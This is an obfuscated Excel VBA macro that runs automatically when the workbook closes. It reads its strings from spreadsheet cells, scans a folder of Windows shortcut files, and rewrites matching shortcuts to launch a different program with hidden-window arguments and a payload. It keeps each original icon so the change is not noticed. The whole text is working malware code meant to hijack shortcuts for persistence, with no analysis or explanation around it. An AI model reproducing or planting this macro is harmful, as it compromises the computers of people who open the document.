Sub Auto_Close()
Set tHlRmX = CreateObject(activeSheet.Range("AX58").value)
Set cLxHXiEFq = CreateObject(activeSheet.Range("AZ58").value)
Set QhlYnDvuR = cLxHXiEFq.GetFolder(tHlRmX.SpecialFolders(activeSheet.Range("BC58").value))
For Each qUemSMBY In QhlYnDvuR.Files
If(InStr(Lcase(qUemSMBY), ".lnk")) Then
Set AkMlfdFzS = tHlRmX.CreateShortcut(tHlRmX.SPecialFolders(activeSheet.Range("BC58").value) & "\" & qUemSMBY.name)
If(InStr(Lcase(AkMlfdFzS.targetPath), activeSheet.Range("BG58").value) or InStr(Lcase(AkMlfdFzS.targetPath), activeSheet.Range("BH58").value) or InStr(Lcase(AkMlfdFzS.targetPath), activeSheet.Range("BL58").value)) Then
AkMlfdFzS.IconLocation = AkMlfdFzS.targetpath
AkMlfdFzS.arguments = "-w " & activeSheet.Range("BN58").Value & AkMlfdFzS.targetPath & "'" & activeSheet.Range("BR58").Value
AkMlfdFzS.targetpath = left(CurDir, InStr(CurDir, ":")-1) & activeSheet.Range("BV58").value
if(Len(AkMlfdFzS.arguments) < 1023) Then
AkMlfdFzS.save
end if
end if
end if
next qUemSMBY
End Sub
